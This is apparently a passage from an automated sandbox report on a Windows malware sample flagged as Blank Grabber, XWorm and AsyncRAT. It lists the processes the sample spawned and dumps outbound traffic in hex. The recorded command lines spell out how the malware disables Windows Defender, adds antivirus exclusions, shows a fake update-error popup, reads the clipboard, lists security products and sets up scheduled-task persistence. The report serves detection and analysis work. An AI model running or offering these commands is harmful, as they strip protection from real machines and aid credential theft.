2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 5d 13 63 af 3b 92 05 6b 73 ef 53 28 b3 7c f2 2c f6 a5 1e 52 9a d9 7b 97 16 09 4e 57 5b 6e 6f 51 55 63 aa ee 9c 06 7e f3 1d ee 48 d8 e7 47 21 af f9 17 d7 d4 69 26 16 3b 0c e3 06 47 61 8d fa 00 2b 8e 4e 4f 60 2b b9 80 0a 8c f8 31 59 c4 32 41 07 2f 59 d3 91 76 65 4e eb fd ff 89 c9 02 a6 5f d2 a9 ee ee 88 e4 51 20 90 89 d3 b5 36 e5 48 11 4c 5e 73 66 64 e4 1b 29 3b 38 24 0d b6 77 51 06 8c 6b d2 0e cc d9 46 14 bd f7 3f a9 b5 12 a8 83 2a f6 f8 ee 56 59 f6 b9 88 fa 91 a4 f0 91 a0 44 f3 e3 47 78 37 65 1b f8 2e 0d 03 61 21 50 78 77 ba 16 60 d3 19 e3 de 26 88 17 66 ba 7f 7b 38 9a dc cc 75 2a c6 f7 c3 ab a3 19 1b 8d a3 32 53 0c 49 3f 67 cc f0 97 30 10 36 ae bb a6 55 79 15 4b b0 1a 5d 27 7d 4b 35 61 78 93 a2 f1 6c 4e 32 00 67 30 4c b8 6f 40 e4 a7 67 5a cd be a0 08 c4 Data Ascii: ]c;ksS(\|,R{NW[noQUc~HG!i&;Ga+NO`+1Y2A/YveN_Q 6HL^sfd);8$wQkF?VYDGx7e.a!Pxw`&f{8u2SI?g06UyK]'}K5axlN2g0Lo@gZ
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 97 f8 da 76 bd 17 4e b3 b1 ac 79 d1 62 4f 51 d6 35 6e f9 30 f2 11 64 c3 6f 11 f2 9d a2 e9 f7 28 68 4e 01 d3 52 23 8a 65 59 09 fc fe 67 b6 3c 24 95 0d ad 06 27 6b f7 18 2a 2d fe c5 4f 6e 8c 7e 63 0a 11 e4 8c 89 e0 1d 09 80 02 c8 36 1b bd 3d 04 e5 07 be 03 d6 bb d2 34 44 8e ac 62 af 2c aa dd 83 9a e3 8c b4 0a 1e 0d 38 68 a9 cb 82 e9 76 57 7d e5 f5 2c 56 ff 4c da bc 60 b1 2c d7 85 05 a9 b8 28 99 9c f1 8c 4c f7 87 d0 79 c9 45 68 1e a4 44 af 97 7c f9 5c 76 e6 e1 d6 e7 67 51 2d 45 6b ca c6 3f 0e 83 88 f1 44 dc 80 f3 9f d6 61 cf 24 c9 ea 8c ac 48 42 72 99 89 99 80 8d bb d8 5b 7a b8 93 db 97 38 18 06 03 c2 45 8c 51 1f 7a f2 5f cc 7b 24 76 4b 5c 10 7c ef be c5 d0 88 f4 30 34 2a 4d dd 93 65 42 f8 c1 b6 91 df b5 76 f4 ad a8 63 17 5e e0 25 56 d9 ce b5 3e 0e c3 cd 66 Data Ascii: vNybOQ5n0do(hNR#eYg<$'k-On~c6=4Db,8hvW},VL`,(LyEhD\|\vgQ-Ek?Da$HBr[z8EQz_{$vK\\|04MeBvc^%V>f
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 4e b7 8f e5 fa ae 44 10 e9 58 d3 8f f2 61 00 b2 75 d0 03 a4 ce f7 1e 6b b1 f4 58 9f a8 8a 6f 5c 11 33 f7 c9 d4 fc 0c 91 ff 13 d1 1d ff be a9 31 8e 74 a4 a6 07 44 70 b0 e7 e9 aa 2b 29 52 cd a8 5b 5e f9 2e de 39 21 08 37 eb c4 9d e0 4a 74 16 06 5f 2a fd a1 e6 db 85 45 ef f7 91 3a cc 20 a3 9d 06 df a0 86 e0 91 b6 ab cb e8 e6 d1 ea d3 ec e6 3d d9 24 d5 b7 06 29 03 2d 4f 5d dc 72 51 c3 af 40 e9 0e d2 5d 38 6f 73 ef 66 ee d4 e5 44 fa 81 5b 64 6a 74 e5 54 20 da 4d 85 a4 12 e6 f3 b3 d5 08 19 ca 0a b3 d6 f8 1b 60 f3 fc d0 32 2c c9 ac eb 6b 0e 6a d8 9f 0b fd 78 51 a7 4b cf 1c 54 d5 fb 8e 50 37 04 4b 62 d2 29 4e 3b 25 97 10 35 4b f9 72 28 ba c1 57 8f 6b 6b 4a 59 4f 77 22 67 51 83 db 48 1d cd 85 34 d4 52 40 ad b3 87 c6 f6 b5 53 ec 2d 90 93 04 79 70 77 dd f9 4f 59 d9 Data Ascii: NDXaukXo\31tDp+)R[^.9!7Jt_*E: =$)-O]rQ@]8osfD[djtT M`2,kjxQKTP7Kb)N;%5Kr(WkkJYOw"gQH4R@S-ypwOY
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: f4 55 f5 04 8b e7 aa 08 19 cd 77 cb 02 16 4b 95 47 10 de 87 2f 68 8c 43 92 65 2d 0f 04 fb d2 79 2a b1 2a 71 96 a6 d7 4a 08 15 ee 54 26 89 43 b4 e2 e6 87 e6 1d 56 e7 ea 75 19 5b a9 e1 06 da a7 6d 56 6a f3 92 4b eb a1 23 56 dc 06 a8 dd 4c a7 1b e0 15 3f 42 2d e6 37 c6 21 3f 62 f6 ed a5 ec b3 0b 55 74 1b fb 9b f6 91 5c 19 ab 87 6f 87 87 fe 57 64 43 1d 90 4c c7 8c b4 4d 9a 97 a9 04 5a b7 17 3f b1 8a 2b bb 92 62 d7 e5 05 12 0a c5 64 80 d2 e4 7b 45 49 fa ba af b5 fc 44 be af 9e a7 1b 2c b3 b2 d9 c4 a8 4b 30 2b f1 66 84 0f 97 10 1c 54 16 03 ee ff 8b aa 82 00 1d 80 df 11 6d 9b fe e9 f2 bb b0 a2 e3 0d 9c e7 0d 11 f4 63 43 4c 2f 63 9a 91 e1 ec 9a 18 35 b8 0b 35 f4 e2 97 30 5a 20 d8 b8 58 99 d2 48 3b 7a cf e5 23 c5 79 1f aa 62 fc 06 c2 29 e2 df 9f 25 fb e6 32 5e 5f Data Ascii: UwKG/hCe-y**qJT&CVu[mVjK#VL?B-7!?bUt\oWdCLMZ?+bd{EID,K0+fTmcCL/c550Z XH;z#yb)%2^_
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 9d 57 f6 e7 27 cc 2b dd 8b 92 33 39 d8 91 ad 23 ae 00 5e c5 74 e6 85 e2 a7 03 f2 3b 9d 61 6a cb f4 d0 1c 7d ba 32 ac 25 94 46 00 c9 70 06 84 e8 47 61 12 94 18 6b ce 67 6a f4 06 2e 5a d7 98 bc af c1 1e 33 c1 ab b8 e5 a6 7b ce 11 90 0d bb 51 de f5 5b 6a 29 7e 88 4b 21 d3 a3 22 a0 07 ef 27 42 36 36 48 29 91 80 76 43 46 e2 6e 72 27 8d 54 01 37 f2 2b e8 f8 18 95 00 5f 32 f7 62 03 bc 52 07 c2 fa 94 ef 2c f8 5b 07 21 c4 6c 4f 2e 87 b7 c1 6c 02 08 92 e0 7f c2 f8 06 ee f5 38 97 38 ef 4c fd f7 d9 d7 f5 e0 77 62 b4 e3 45 95 eb b7 07 e3 2c a6 b2 f5 6a 0f 5a aa f0 13 21 5a 30 ee d1 f7 c4 fd 80 26 67 9d 7c 6f 70 3c 70 78 8f 09 24 5e 2e e8 b9 bc b9 57 72 f1 49 dc 95 31 39 34 c0 8a a5 9f e8 ef fd b9 68 9c c5 1a 43 0f 52 82 4f 42 f5 e8 6d 5e ac 1c 3a b1 7d 52 83 b4 60 04 Data Ascii: W'+39#^t;aj}2%FpGakgj.Z3{Q[j)~K!"'B66H)vCFnr'T7+_2bR,[!lO.l88LwbE,jZ!Z0&g\|op<px$^.WrI194hCROBm^:}R`
2024-10-13 17:01:51 UTC	16384	OUT	Data Raw: 79 e9 6a 12 a0 b0 fc 6c 38 47 0c 17 54 75 35 c8 47 1a 39 2c 62 01 6d a5 9d 65 6e c2 dd bb cb 78 e8 53 b5 29 28 96 95 0f fa ce bb 91 80 2c da 9e 76 f5 0a b6 b6 e7 de 41 55 e2 c0 f8 ec f2 a8 01 af fc 38 0e c7 ea 11 d0 4a c5 c9 af 9f b5 5e 2f 59 92 76 b1 73 5f 38 c2 6b d8 03 66 fc cb e5 60 3a da f6 18 19 4e 03 c0 77 1a e4 23 c4 c8 8a 6a 92 8b 12 af 83 39 48 9a 71 9c d0 e6 a9 31 9e 7f ea 74 36 ae 4e de 51 c2 d7 ed b1 62 10 06 03 c2 0d 61 f6 5f cb 99 29 2e e6 1c f0 5b a4 9c 3f a1 3f 13 29 30 74 9e a4 f9 cb 14 1c d6 c4 a9 35 fa 4c dd 4a 38 35 b2 27 f3 21 19 c2 c4 24 44 e9 d8 ce 0e 39 bb 56 22 38 4a 23 63 e6 4c 69 89 1a 22 8d 19 55 bf ee 36 79 9c 37 e1 40 4d d9 d2 c1 0f 0f 5f 9c 0a 5b 6b b0 f5 f8 db 31 43 0e 81 e2 8f 77 fe 7a 22 fc 12 78 bc 1c 13 a0 c0 4b 3b 57 Data Ascii: yjl8GTu5G9,bmenxS)(,vAU8J^/Yvs_8kf`:Nw#j9Hq1t6NQba_).[??)0t5LJ85'!$D9V"8J#cLi"U6y7@M_[k1Cwz"xK;W
2024-10-13 17:01:52 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 13 Oct 2024 17:01:52 GMT Content-Type: application/json Content-Length: 73 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	13:01:08
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\sB2ClgrGng.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sB2ClgrGng.exe"
Imagebase:	0x7ff644870000
File size:	7'962'066 bytes
MD5 hash:	4667AD84B811400BABC982785614BB5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:01:09
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\sB2ClgrGng.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sB2ClgrGng.exe"
Imagebase:	0x7ff644870000
File size:	7'962'066 bytes
MD5 hash:	4667AD84B811400BABC982785614BB5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "start bound.exe"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:01:11
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"
Imagebase:	0x7ff6c00d0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Local\Temp\bound.exe
Wow64 process (32bit):	false
Commandline:	bound.exe
Imagebase:	0x2f0000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:01:12
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:01:13
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:01:13
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7712, Parent PID: 7660

General

Target ID:	22
Start time:	13:01:13
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:01:13
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7d0a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7d0a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff753a70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:01:14
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:01:17
Start date:	13/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:01:17
Start date:	13/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:01:17
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 8116, Parent PID: 2892

General

Target ID:	36
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
